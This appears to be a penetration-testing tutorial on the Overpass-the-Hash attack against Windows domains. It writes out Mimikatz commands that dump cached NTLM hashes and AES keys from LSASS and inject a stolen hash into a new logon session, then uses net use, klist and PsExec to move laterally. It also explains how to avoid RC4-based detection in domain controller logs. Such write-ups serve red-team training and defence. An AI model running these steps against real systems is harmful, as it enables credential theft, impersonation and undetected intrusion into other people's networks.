Overpass the Hash

In this method we use the user's NTLM hash (the NT hash; an AES key works too if we have one) as the Kerberos secret to obtain a TGT, and from it TGSs, from the Domain Controller, without ever knowing the password. In a scenario where you have gained access to a system that another user is logged into, we can take that user's cached credentials out of LSASS, use them to procure a TGT and TGS, and then use those tickets to log in to another service or system as that user.

This technique requires local administrative rights (in practice SYSTEM or SeDebugPrivilege) on the machine where Mimikatz runs, because both reading LSASS and injecting the hash into a new logon session need them. Moving laterally afterwards with PsExec additionally requires that the impersonated user be a local administrator on the target, since PsExec copies its service binary to the target's special admin share ADMIN$.

The following set of commands, run inside Mimikatz after privilege::debug has been issued (or with Mimikatz running as SYSTEM), creates the logon session from which the TGT will be requested:

sekurlsa::logonpasswords #lists the logged-on users along with their cached credentials: NTLM hashes and, where present, AES keys

#Next, create a new logon session with the stolen hash and specify the process that will use it
sekurlsa::pth /user:john /domain:p42.com /ntlm:e2b475c22da420638630d874a977c727 /run:PowerShell.exe

Passing /ntlm: forces the Kerberos exchange to RC4 (encryption type 0x17), which stands out in the DC's 4768 events on a domain where AES is the norm. If logonpasswords also gave you the user's AES key, pass /aes256:<key> (optionally alongside /ntlm:) so the ticket request uses AES like a normal logon.

With this we should have a PowerShell window in which every network authentication is performed as john. Note that whoami in that window still reports the original account: sekurlsa::pth replaces only the outbound network credentials of the new logon session, exactly like runas /netonly, so the local token is unchanged.

No ticket exists yet: the TGT is only requested the first time the new logon session authenticates with Kerberos. We trigger that by initiating an interaction with a Kerberos-aware service, which makes the session request a TGT from the domain controller and then a service ticket for that service,

net use \\computername #this should be the computer that you plan to interact with; use its host name, not an IP address, or Windows falls back to NTLM and no ticket is issued

klist #lists the tickets now held by the session: a krbtgt TGT for the domain and a cifs service ticket for computername

We can now use the PsExec tool to execute commands on the remote computer in the context of the user John (the cifs service ticket obtained above authenticates the SMB connection),

.\PsExec.exe \\computername cmd.exe
